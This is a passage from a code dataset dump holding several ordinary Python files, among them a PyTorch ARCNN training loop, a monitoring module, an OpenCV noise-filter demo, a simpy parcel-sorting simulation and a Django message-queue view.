\"model_epoch_{}.pth\".format(epoch) # is that all right? \n # torch.save(model, checkpoint_path+model_out_path)\n torch.save(model.state_dict(), checkpoint_path+(\"checkpoint_ARCNN_epoch_{}.pkl\".format(epoch))) # use this line to save parameters only \n print(\"Checkpoint saved to {}\".format(checkpoint_path))\n\n# can I open 2 files at one time? \n# A: Sure\n\ntrain_data = h5py.File(train_data_path, \"r\")\ntest_data = h5py.File(test_data_path, \"r\")\n\n\nfor epoch in range(1, opt.nEpochs + 1):\n train(epoch, train_data, opt.batchSize)\n test(epoch, test_data, opt.testBatchSize)\n checkpoint(epoch)\n\n", "sub_path": "train_batch.py", "file_name": "train_batch.py", "file_ext": "py", "file_size_in_byte": 5436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 53, "usage_type": "attribute"}, {"api_name": "model.NetARCNN", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "model.cuda", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 67, "usage_type": "name"}, {"api_name": "model.parameters", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 77, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.sort", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 110, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 111, "usage_type": "attribute"}, {"api_name": "math.log10", "line_number": 120, "usage_type": "call"}, {"api_name": "math.log10", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 135, "usage_type": "call"}, {"api_name": "model.state_dict", "line_number": 135, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 141, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "453583940", "text": "#!/usr/bin/env python\n\nimport copy\nimport logging\n\nfrom hc.monitor import Monitor\n\nlogger = logging.getLogger(\"Monitor.{}\".format(__name__))\n\n\nclass zmq_send(Monitor):\n\n def __init__(self, config, **args):\n Monitor.__init__(self, config, **args)\n\n self.metrics = self.getconfig(\"metrics\", default=[])\n self.savevar = self.getconfig(\"save\", default=False)\n self.timeout = self.getconfig(\"timeout\", default=2)\n self.ignore_missing = self.getconfig(\"ignore_missing\", default=True)\n\n def search(self, items):\n\n if isinstance(items, dict):\n\n if 'query' in items:\n status, results = self.getvars(self.build_query(items), first=False)\n if not status:\n raise Exception('Missing value')\n\n if len(results) == 1:\n return results[0]['values']\n else:\n data = {}\n for res in results:\n # FIXME: it takes only the last path part into account\n data[res['path'][-1]] = res['values']\n return data\n elif 'value' in items:\n return items['value']\n else:\n for key, value in items.items():\n items[key] = self.search(value)\n elif isinstance(items, list):\n for idx, item in enumerate(items):\n items[idx] = self.search(item)\n else:\n return self.getconfig(items, search_cfg=False)\n\n return items\n\n def build_query(self, keys, res=False, op_type='append'):\n\n if isinstance(keys, list):\n query = {'query': keys}\n else:\n query = keys\n\n if 'servers' in query:\n if isinstance(query['servers'], dict):\n ressrv, query['servers'] = self.getvars(query['servers'], default=[])\n\n try:\n if query['ns'] == 'localhost':\n query['ns'] = self.namespace\n except KeyError:\n pass\n\n if not res:\n return query\n\n if 'query' in query:\n try:\n query['query'][1][1] = res\n except(IndexError):\n logger.debug('Operation: {}'.format(op_type))\n if op_type == 'extend':\n query['query'][1].extend(res)\n else:\n query['query'][1].append(res)\n\n return query\n\n def get_from(self, keys):\n logger.debug('Getting data from: {}'.format(keys))\n if type(keys['from']) not in [list, dict]:\n return keys['from']\n\n return self.search(keys['from'])\n\n def send_to(self, name, keys, results, op_type='append'):\n\n logger.debug('Data to: {}'.format(keys['to']))\n\n data = {'failed': set(), 'ok': set()}\n\n try:\n onchange = keys['to']['onchange']\n except KeyError:\n onchange = False\n\n if onchange:\n resstatus, old_res = self.getvars(['DR', [[self.modulename, name, 'from']]])\n if not resstatus:\n logger.debug('No old data available.')\n old_res = None\n elif old_res == results:\n logger.debug('Results are the same.')\n return None\n\n query = self.build_query(keys['to'], res=results, op_type=op_type)\n resstatus, back_res = self.getvars(query, raw=True)\n\n for srv, res in back_res:\n if not res:\n data['failed'].add(srv)\n elif res['status']:\n data['ok'].add(srv)\n\n return data\n\n def resolve_when(self, keys):\n\n try:\n conditions = keys['when']\n except KeyError:\n return False\n\n for cond in conditions:\n logger.debug(\"When condition: {}\".format(cond))\n rsstat, results = self.getvars(cond)\n logger.debug(\"When Status: {} Result: {}\".format(rsstat, results))\n\n if not rsstat:\n logger.debug(\"Condition not found: not executing: {}\".format(cond))\n return True\n\n if not results['resolved'][0]:\n logger.debug(\"Condition not met: not executing: {}\".format(cond))\n return True\n\n return\n\n def runit(self):\n\n status = 0\n errs = ''\n\n data = {}\n for metric in self.metrics:\n name = list(metric.keys())[0]\n keys = copy.deepcopy(metric[name])\n\n if self.resolve_when(keys):\n continue\n\n try:\n results = self.get_from(keys)\n # FIXME: create a special type of exception\n except Exception as err:\n logger.debug(err)\n if self.ignore_missing:\n continue\n raise(err)\n\n data[name] = {'from': {}, 'to': {}}\n if self.savevar:\n data[name]['from'] = results\n\n op_type = keys.get('op_type', 'append')\n data[name]['to'] = self.send_to(name, keys, results, op_type=op_type)\n\n return status, data, {}, errs\n", "sub_path": "hc/modules/zmq_send.py", "file_name": "zmq_send.py", "file_ext": "py", "file_size_in_byte": 5145, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "hc.monitor.Monitor", "line_number": 11, "usage_type": "name"}, {"api_name": "hc.monitor.Monitor.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "hc.monitor.Monitor", "line_number": 14, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 151, "usage_type": "call"}]} +{"seq_id": "261531065", "text": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef salt(img, n):\n for k in range(n):\n i = int(np.random.random() * img.shape[1]);\n j = int(np.random.random() * img.shape[0]);\n if img.ndim == 2:\n img[j,i] = 255\n elif img.ndim == 3:\n img[j,i,0]= 255\n img[j,i,1]= 255\n img[j,i,2]= 255\n return img\n\n\n\n\nimg = cv2.imread(r\"D:\\Python_all\\pythonholder\\practice_project\\character_recognition\\test_image\\test\\test03\\mid_grabcut_result.jpg\",0)\n# img = cv2.resize(img,(384,216))\n#高斯滤波\nlbimg=cv2.GaussianBlur(img,(3,3),1.8)\n#中值滤波\nimg = salt(img, 500)\nmiddle = cv2.medianBlur(img, 5)\n# cv2.imwrite(r\"D:\\Python_all\\pythonholder\\practice_project\\character_recognition\\test_image\\test\\test03\\ middle.jpg\", middle, params=None)\nimg = cv2.resize(img,(680,480))\nlbimg = cv2.resize(lbimg,(680,480))\n\n\nmiddle = cv2.resize(middle,(680,480))\ncv2.imshow('src',img)\ncv2.imshow('dst',middle)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n", "sub_path": "filter/filter_recognizition.py", "file_name": "filter_recognizition.py", "file_ext": "py", "file_size_in_byte": 1020, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.random.random", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "634933196", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"\n作者:Ted\n日期:2017-07-13\n说明:\n\n包裹 class\n货物 class\nUld class\n\n\"\"\"\nimport simpy\nimport pandas as pd\n\nfrom collections import namedtuple, defaultdict\nfrom src.utils import PackageRecord, PipelineRecord, TruckRecord\nfrom src.controllers import PathGenerator\nimport logging\n\n__all__ = [\"Package\", \"Truck\", \"Uld\", \"SmallBag\", \"SmallPackage\", \"Pipeline\", \"PipelineRes\", \"BasePipeline\"]\n\n# init path generator\npath_generator = PathGenerator()\n\n\nclass Package:\n \"\"\"包裹\"\"\"\n def __init__(self,\n env: simpy.Environment,\n attr: pd.Series,):\n\n # 包裹的所有信息都在 attr\n self.attr = attr\n # id\n self.item_id = self.attr[\"parcel_id\"]\n # env\n self.env = env\n # data store\n self.machine_data = []\n self.pipeline_data = []\n # path_generator\n self.path_generator = path_generator.path_generator\n # paths\n self.planned_path = None\n self.path = None\n # next pipeline_id\n self.next_pipeline = None\n\n # use in unload machine\n def set_path(self, package_start):\n\n dest_code = self.attr[\"dest_zone_code\"]\n dest_type = self.attr[\"dest_type\"]\n parcel_type = self.attr[\"parcel_type\"]\n sorter_type = \"reload\" if parcel_type == \"parcel\" else \"small_sort\"\n\n path = path_generator.path_generator(package_start, dest_code, sorter_type, dest_type)\n\n self.planned_path = tuple(path)\n self.path = list(self.planned_path)\n self.next_pipeline = self.planned_path[:2]\n\n def insert_data(self, record: namedtuple):\n # print out data\n if isinstance(record, PackageRecord):\n self.machine_data.append(record)\n\n logging.debug(msg=f\"Package: {record.package_id} , action: {record.action}\"\n f\", equipment: {record.equipment_id}, timestamp: {record.time_stamp}\")\n\n elif isinstance(record, PipelineRecord):\n self.pipeline_data.append(record)\n\n logging.debug(msg=f\"Package: {record.package_id} , action: {record.action}\"\n f\", pipeline: {record.pipeline_id}, timestamp: {record.time_stamp}\")\n\n else:\n raise ValueError(\"Wrong type of record\")\n\n def pop_mark(self):\n \"\"\"删去第一个节点, 返回下一个 pipeline id: (now_loc, next_loc)\"\"\"\n self.path.pop(0)\n if len(self.path) >= 2:\n self.next_pipeline = tuple(self.path[0: 2])\n # 当 package 去到 reload(终分拣), 终分拣的队列 id 只有一个值\n elif len(self.path) == 1:\n self.next_pipeline = self.path[-1]\n else:\n raise ValueError('The path have been empty!')\n # remove the now_loc\n # 改变下一个 pipeline id\n\n def __str__(self):\n display_dct = dict(self.attr)\n return f\"\"\n\n\nclass SmallPackage(Package):\n \"\"\"小件包裹\"\"\"\n def __str__(self):\n display_dct = dict(self.attr)\n return f\"\"\n\n\nclass SmallBag(Package):\n \"\"\"小件包\"\"\"\n def __init__(self, env: simpy.Environment,\n attr: pd.Series,\n small_packages: list):\n\n super(SmallBag, self).__init__(env, attr,)\n\n # 存储小件包裹\n self.store = small_packages\n assert self._all_are_small_packages(), \"SmallBag store SmallPackage only !!\"\n self.store_size = len(self.store)\n\n def _all_are_small_packages(self):\n packages_bool = [isinstance(small_package, SmallPackage) for small_package in self.store]\n return all(packages_bool)\n\n def __str__(self):\n display_dct = dict(self.attr)\n return f\"\"\n\n\nclass Truck:\n \"\"\"货车\"\"\"\n def __init__(self, env: simpy.Environment, item_id: str, come_time: int, truck_type: str, packages: list):\n \"\"\"\n :param truck_id: self explain\n :param come_time: self explain\n :param packages: a data frame contain all packages\n \"\"\"\n self.item_id = item_id\n self.come_time = come_time\n self.store = packages\n assert self._all_are_packages(), \"Truck store Package only !!\"\n self.store_size = len(self.store)\n self.truck_type = truck_type\n self.env = env\n self.truck_data = []\n\n def _all_are_packages(self):\n packages_bool = [isinstance(package, Package) for package in self.store]\n return all(packages_bool)\n\n def insert_data(self, record: namedtuple):\n\n if isinstance(record, TruckRecord):\n self.truck_data.append(record)\n else:\n raise ValueError(\"Wrong type of record\")\n\n def __str__(self):\n return f\"\"\n\n\nclass Uld(Truck):\n \"\"\"航空箱\"\"\"\n pass\n\n\nclass BasePipeline:\n\n def __init__(self, env: simpy.Environment, pipeline_id: str, equipment_id: str, machine_type: str, ):\n\n self.env = env\n self.pipeline_id = pipeline_id\n self.equipment_id = equipment_id\n self.queue_id = pipeline_id\n self.machine_type = machine_type\n self.queue = simpy.Store(env)\n\n def get(self):\n return self.queue.get()\n\n def put(self, item):\n\n item.insert_data(\n PipelineRecord(\n pipeline_id=':'.join(self.pipeline_id),\n queue_id=self.queue_id,\n package_id=item.item_id,\n time_stamp=self.env.now,\n action=\"start\", ))\n\n self.queue.put(item)\n\n\nclass Pipeline:\n\n \"\"\"传送带\"\"\"\n\n def __init__(self,\n env: simpy.Environment,\n delay_time: float,\n pipeline_id: tuple,\n queue_id: str,\n machine_type: str,\n ):\n\n self.env = env\n self.delay = delay_time\n self.queue = simpy.Store(env)\n self.pipeline_id = pipeline_id\n self.queue_id = queue_id\n self.machine_type = machine_type\n self.equipment_id = self.pipeline_id[1] # in Pipeline the equipment_id is equipment after this pipeline\n\n def latency(self, item: Package):\n \"\"\"模拟传送时间\"\"\"\n\n # pipeline start server\n item.insert_data(\n PipelineRecord(\n pipeline_id=':'.join(self.pipeline_id),\n queue_id=self.queue_id,\n package_id=item.item_id,\n time_stamp=self.env.now,\n action=\"start\", ))\n\n yield self.env.timeout(self.delay)\n # cutting path\n item.pop_mark()\n\n # package wait for next process\n item.insert_data(\n PackageRecord(\n equipment_id=self.equipment_id,\n package_id=item.item_id,\n time_stamp=self.env.now,\n action=\"wait\", ))\n\n # pipeline end server\n item.insert_data(\n PipelineRecord(\n pipeline_id=':'.join(self.pipeline_id),\n queue_id=self.queue_id,\n package_id=item.item_id,\n time_stamp=self.env.now,\n action=\"end\", ))\n\n self.queue.put(item)\n\n def put(self, item: Package):\n self.env.process(self.latency(item))\n\n def get(self):\n return self.queue.get()\n\n def __str__(self):\n return f\"\"\n\n\nclass PipelineRes(Pipeline):\n\n def __init__(self,\n env: simpy.Environment,\n resource_dict: defaultdict,\n equipment_resource_dict: dict,\n delay_time: float,\n pipeline_id: tuple,\n queue_id: str,\n machine_type: str,\n ):\n\n super(PipelineRes, self).__init__(env,\n delay_time,\n pipeline_id,\n queue_id,\n machine_type,)\n\n self.equipment_last = self.pipeline_id[0] # in PipelineRes the equipment_id is equipment before this pipeline\n self.equipment_next = self.pipeline_id[1] # in PipelineRes the equipment_id is equipment before this pipeline\n self.resource_id = equipment_resource_dict[self.equipment_last]\n self.resource = resource_dict[self.resource_id][\"resource\"]\n\n def latency(self, item: Package):\n\n with self.resource.request() as req:\n \"\"\"模拟传送时间\"\"\"\n\n yield req\n\n # pipeline start server\n item.insert_data(\n PipelineRecord(\n pipeline_id=':'.join(self.pipeline_id),\n queue_id=self.queue_id,\n package_id=item.item_id,\n time_stamp=self.env.now,\n action=\"start\", ))\n\n yield self.env.timeout(self.delay)\n\n # package start for process\n item.insert_data(\n PackageRecord(\n equipment_id=self.equipment_next,\n package_id=item.item_id,\n time_stamp=self.env.now,\n action=\"wait\", ))\n\n # cutting path, change item next_pipeline\n item.pop_mark()\n\n # pipeline end server\n item.insert_data(\n PipelineRecord(\n pipeline_id=':'.join(self.pipeline_id),\n queue_id=self.queue_id,\n package_id=item.item_id,\n time_stamp=self.env.now,\n action=\"end\", ))\n\n self.queue.put(item)\n\n\nif __name__ == '__main__':\n pass\n", "sub_path": "src/vehicles/items.py", "file_name": "items.py", "file_ext": "py", "file_size_in_byte": 9938, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "src.controllers.PathGenerator", "line_number": 24, "usage_type": "call"}, {"api_name": "simpy.Environment", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 31, "usage_type": "attribute"}, {"api_name": "collections.namedtuple", "line_number": 64, "usage_type": "name"}, {"api_name": "src.utils.PackageRecord", "line_number": 66, "usage_type": "argument"}, {"api_name": "logging.debug", "line_number": 69, "usage_type": "call"}, {"api_name": "src.utils.PipelineRecord", "line_number": 72, "usage_type": "argument"}, {"api_name": "logging.debug", "line_number": 75, "usage_type": "call"}, {"api_name": "simpy.Environment", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 109, "usage_type": "attribute"}, {"api_name": "simpy.Environment", "line_number": 130, "usage_type": "attribute"}, {"api_name": "collections.namedtuple", "line_number": 149, "usage_type": "name"}, {"api_name": "src.utils.TruckRecord", "line_number": 151, "usage_type": "argument"}, {"api_name": "simpy.Environment", "line_number": 167, "usage_type": "attribute"}, {"api_name": "simpy.Store", "line_number": 174, "usage_type": "call"}, {"api_name": "src.utils.PipelineRecord", "line_number": 182, "usage_type": "call"}, {"api_name": "simpy.Environment", "line_number": 197, "usage_type": "attribute"}, {"api_name": "simpy.Store", "line_number": 206, "usage_type": "call"}, {"api_name": "src.utils.PipelineRecord", "line_number": 217, "usage_type": "call"}, {"api_name": "src.utils.PackageRecord", "line_number": 230, "usage_type": "call"}, {"api_name": "src.utils.PipelineRecord", "line_number": 238, "usage_type": "call"}, {"api_name": "simpy.Environment", "line_number": 260, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 261, "usage_type": "name"}, {"api_name": "src.utils.PipelineRecord", "line_number": 289, "usage_type": "call"}, {"api_name": "src.utils.PackageRecord", "line_number": 300, "usage_type": "call"}, {"api_name": "src.utils.PipelineRecord", "line_number": 311, "usage_type": "call"}]} +{"seq_id": "283742676", "text": "import pyodbc\n# from accounts.models import User\n\ncon = pyodbc.connect('Trusted_Connection=yes', driver = '{SQL Server}',server = 'DESKTOP-6O0KO5B\\SQLEXPRESS', database ='sanpham')\ncursor = con.cursor()\n\ndef listIdSp():\n query = \"select id from danhsach\"\n try:\n cursor.execute(query)\n except Exception:\n return False\n data = []\n for row in cursor.fetchall():\n data.append(int(row.id))\n return data\ndef codeAnalysis():\n listId = listIdSp()\n data = []\n for i in listId:\n query = \"select COUNT(*) as code_count from dinhdanh where id_sp =\" + str(i)\n try:\n cursor.execute(query)\n except Exception:\n return False\n for row in cursor.fetchall():\n data.append(int(row.code_count))\n return data\ndef getDataDanhSach(): # lấy thông tin về các sản phẩm đang tồn tại\n query = \"select * from danhsach\"\n try:\n cursor.execute(query)\n except Exception:\n return False\n data = []\n for row in cursor.fetchall():\n data.append(row)\n return data\n# from ..app.utils import getDataDanhSach\n# data = getDataDanhSach()\n\n# for i in data:\n# print('\\\"' + i[1] + '\\\"')\ndef history():\n query = \"select CAST(ngay_sinh as DATE),DATEPART(hour,ngay_sinh) as gio,sum(num) as sum_day from lichsu \" \\\n \"group by CAST(ngay_sinh as date) ,DATEPART(hour,ngay_sinh) \" \\\n \"order by CAST(ngay_sinh as date),DATEPART(hour,ngay_sinh)\"\n try:\n cursor.execute(query)\n except Exception:\n return False\n data = []\n for row in cursor.fetchall():\n data.append(row)\n return data\n# print(history())", "sub_path": "analysis/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1685, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pyodbc.connect", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "423421672", "text": "# Django modules\nfrom django.shortcuts import render_to_response\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.template import RequestContext\nfrom django.db import transaction\nfrom django.views.decorators.csrf import csrf_protect\n\n# From Python\n\n# Our modules\nfrom infra.forms.message_type import SearchMessageQueueForm, ActionMessageQueueFormSet\nfrom infra.models import MessageQueue\nfrom infra.custom.build_query_filter import build_query_filter\nimport infra.custom.custom_json as custom_json\n\n# This program's constants\n\n# Decorators to ensure that user is logged in and\n# is a staff member\n@login_required\n@staff_member_required\n@csrf_protect\n# Have to fix all exception before enabling commit manually.\n# When turned on, will hide any exception behind its TransactionManagementError\n# so remark off when debugging...\n@transaction.commit_manually\ndef my_messages(request, delivery_method='Q'):\n \"\"\"\n\n Display Messages for logged in User and allow\n action on message.\n\n Delivery Method : A=Alerts, Q=Queued Messages\n\n queryset_criteria : Because we want to save previous query\n criteria as json in formset so that we can redisplay the rows\n which were updated. However filter() args cannot be simply be\n treated like a dict, so we borrowed code from django snippets\n that allow us to express the query criteria as a list which\n can be converted to Q objects. \n See infra/custom/build_query_filter.py\n\n Uses template infra/my_messages.html\n\n \"\"\"\n # Initialise Error Messages\n error_messages = []\n\n # Post happens when user clicks on enters data and press submit button\n if request.method == 'POST':\n\n search_form = SearchMessageQueueForm(request.POST)\n # User pressed search button \n if request.POST.has_key('search'):\n if search_form.is_valid():\n # Reset queryset criteria, we and together all \n queryset_criteria = ['and', ['exact', 'recipient', request.user.id]]\n\n if search_form.cleaned_data['delivery_method']:\n queryset_criteria.append(['exact', 'message_type__delivery_method', search_form.cleaned_data['delivery_method']])\n else:\n queryset_criteria.append(['exact', 'message_type__delivery_method', delivery_method])\n if search_form.cleaned_data['required_action']:\n queryset_criteria.append(['exact', 'message_type__required_action', search_form.cleaned_data['required_action']])\n if search_form.cleaned_data['external_delivery_method']:\n queryset_criteria.append(['exact', 'message_type__external_delivery_method', search_form.cleaned_data['external_delivery_method']])\n if search_form.cleaned_data['sender_name']:\n queryset_criteria.append(['exact', 'sender_name', search_form.cleaned_data['sender_name']])\n if search_form.cleaned_data['sent_on']:\n queryset_criteria.append(['gte', 'sent_on', search_form.cleaned_data['sent_on']])\n if search_form.cleaned_data.has_key('acted_flag'):\n queryset_criteria.append(['isnull', 'action_on', (not search_form.cleaned_data['acted_flag'])])\n\n my_messages = MessageQueue.objects.filter(build_query_filter(queryset_criteria))\n message_formset = ActionMessageQueueFormSet(queryset=my_messages)\n # User press post to save updates to messages\n elif request.POST.has_key('post'):\n # Retrieve previous queryset criteria\n queryset_criteria = custom_json.loads(request.POST.get('queryset_criteria'))\n # Instantiate formset from Post request and with previous queryset\n my_messages = MessageQueue.objects.filter(build_query_filter(queryset_criteria))\n message_formset = ActionMessageQueueFormSet(request.POST, queryset=my_messages)\n # Save updates to messages\n if message_formset.is_valid():\n saved_messages = message_formset.save()\n transaction.commit()\n # Inform user how many saved\n error_messages.append(_(\"%d Message(s) has been updated\") % (len(saved_messages),))\n # Reset formset (to show updated messages)\n message_formset = ActionMessageQueueFormSet(queryset=my_messages)\n # else redisplay formset with errors\n\n else:\n # GET Method (1st time this page is called), default our hidden entity\n search_form = SearchMessageQueueForm()\n # Default is show unread messages only\n queryset_criteria = ['and', ['exact', 'recipient', request.user.id], \n ['exact', 'message_type__delivery_method', delivery_method],\n ['isnull', 'action_on', True]]\n\n my_messages = MessageQueue.objects.filter(build_query_filter(queryset_criteria))\n message_formset = ActionMessageQueueFormSet(queryset=my_messages)\n\n # Note: Paginator does not work with formsets\n\n # Even reads need to be committed\n transaction.commit()\n # Display page to user. We have to commit again, possibly because render to response will \n # dirty trx buffer again\n with transaction.commit_on_success(): return render_to_response('infra/my_messages.html', {'search_form': search_form, \n 'message_formset': message_formset, 'queryset_criteria': custom_json.dumps(queryset_criteria),\n 'error_messages': error_messages, 'media': search_form.media,\n }, context_instance=RequestContext(request))\n", "sub_path": "infra/views/my_messages.py", "file_name": "my_messages.py", "file_ext": "py", "file_size_in_byte": 5725, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "infra.forms.message_type.SearchMessageQueueForm", "line_number": 54, "usage_type": "call"}, {"api_name": "infra.models.MessageQueue.objects.filter", "line_number": 76, "usage_type": "call"}, {"api_name": "infra.models.MessageQueue.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "infra.models.MessageQueue", "line_number": 76, "usage_type": "name"}, {"api_name": "infra.custom.build_query_filter.build_query_filter", "line_number": 76, "usage_type": "call"}, {"api_name": "infra.forms.message_type.ActionMessageQueueFormSet", "line_number": 77, "usage_type": "call"}, {"api_name": "infra.custom.custom_json.loads", "line_number": 81, "usage_type": "call"}, {"api_name": "infra.custom.custom_json", "line_number": 81, "usage_type": "name"}, {"api_name": "infra.models.MessageQueue.objects.filter", "line_number": 83, "usage_type": "call"}, {"api_name": "infra.models.MessageQueue.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "infra.models.MessageQueue", "line_number": 83, "usage_type": "name"}, {"api_name": "infra.custom.build_query_filter.build_query_filter", "line_number": 83, "usage_type": "call"}, {"api_name": "infra.forms.message_type.ActionMessageQueueFormSet", "line_number": 84, "usage_type": "call"}, {"api_name": "django.db.transaction.commit", "line_number": 88, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 88, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 90, "usage_type": "call"}, {"api_name": "infra.forms.message_type.ActionMessageQueueFormSet", "line_number": 92, "usage_type": "call"}, {"api_name": "infra.forms.message_type.SearchMessageQueueForm", "line_number": 97, "usage_type": "call"}, {"api_name": "infra.models.MessageQueue.objects.filter", "line_number": 103, "usage_type": "call"}, {"api_name": "infra.models.MessageQueue.objects", "line_number": 103, "usage_type": "attribute"}, {"api_name": "infra.models.MessageQueue", "line_number": 103, "usage_type": "name"}, {"api_name": "infra.custom.build_query_filter.build_query_filter", "line_number": 103, "usage_type": "call"}, {"api_name": "infra.forms.message_type.ActionMessageQueueFormSet", "line_number": 104, "usage_type": "call"}, {"api_name": "django.db.transaction.commit", "line_number": 109, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 109, "usage_type": "name"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 112, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 112, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 112, "usage_type": "call"}, {"api_name": "infra.custom.custom_json.dumps", "line_number": 113, "usage_type": "call"}, {"api_name": "infra.custom.custom_json", "line_number": 113, "usage_type": "name"}, {"api_name": "django.template.RequestContext", "line_number": 115, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.admin.views.decorators.staff_member_required", "line_number": 23, "usage_type": "name"}, {"api_name": "django.views.decorators.csrf.csrf_protect", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.transaction.commit_manually", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "104888412", "text": "import shutil, os, sys\nfrom fenx.resources import icon_process\nfrom PyQt5.QtWidgets import QApplication\napp = QApplication([])\n\npng = os.path.join(os.path.dirname(icon_process.__file__), 'icons', 'fenx.png')\npng_i = os.path.join(os.path.dirname(icon_process.__file__), 'icons', 'fenx_install.png')\n\nif not os.path.exists(png):\n sys.exit(1)\n \nicon_process.convert_to_ico(png_i)\nficon = icon_process.convert_to_ico(png)\n\ntray = os.path.join(os.path.dirname(png), 'tray.png')\ntrayw = os.path.join(os.path.dirname(png), 'tray_wait.png')\nshutil.copy2(png, tray)\nicon_process.color_correct_hsv(png, trayw, v=0.5)\n", "sub_path": "fenx_icon.py", "file_name": "fenx_icon.py", "file_ext": "py", "file_size_in_byte": 610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "fenx.resources.icon_process.__file__", "line_number": 6, "usage_type": "attribute"}, {"api_name": "fenx.resources.icon_process", "line_number": 6, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 7, 